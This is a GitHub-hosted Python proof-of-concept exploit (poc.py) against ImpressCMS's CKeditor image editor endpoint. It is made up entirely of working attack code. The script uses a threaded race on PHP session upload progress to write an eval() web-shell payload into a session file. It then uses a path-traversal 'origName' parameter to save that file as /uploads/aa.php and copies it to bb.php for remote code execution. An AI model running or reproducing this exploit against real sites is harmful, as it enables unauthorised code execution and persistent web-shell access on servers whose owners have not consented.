-
Notifications
You must be signed in to change notification settings - Fork 15
/
poc.py
43 lines (41 loc) · 1.45 KB
/
poc.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
import sys
import string
import requests
from multiprocessing.dummy import Pool as ThreadPool
if len(sys.argv)<3:
print('python '+sys.argv[0]+' http://localhost 1')
print('python '+sys.argv[0]+' http://localhost 2')
exit()
HOST = sys.argv[1]
PATH = '/editors/CKeditor/ceditfinder/imageeditor/processImage.php'
sess_name = 'letspwnimpressCMS'
headers = {
'Connection': 'close',
'Cookie': 'PHPSESSID=' + sess_name
}
payload = '<?=eval($_GET[a]);exit;//'
def runner1(i):
data = {
'PHP_SESSION_UPLOAD_PROGRESS': 'A' + payload + 'A'
}
while 1:
fp = open('/etc/hosts', 'rb')
r = requests.post(HOST+PATH, files={'f': fp}, data=data, headers=headers)
fp.close()
def runner2(i):
filename = '/var/lib/php/sessions/sess_' + sess_name
while 1:
url = HOST+PATH+'?origName=.....///.....///.....///.....///uploads/aa.php&imageName=/var/lib/php/sessions/sess_letspwnimpressCMS&action=save'
r = requests.get(url, headers=headers)
c = r.content
url2 = requests.get(HOST+'/uploads/aa.php?a=echo%20%2799999999999999999999999999999%27;copy(%27aa.php%27,%27bb.php%27);')
if('99999999999999999999999999999' in url2.text):
print('[+] done!')
print('[!] Check '+HOST+'/uploads/bb.php?a=phpinfo();')
exit()
if sys.argv[2] == '1':
runner = runner1
else:
runner = runner2
pool = ThreadPool(32)
result = pool.map_async( runner, range(32) ).get(0xffff)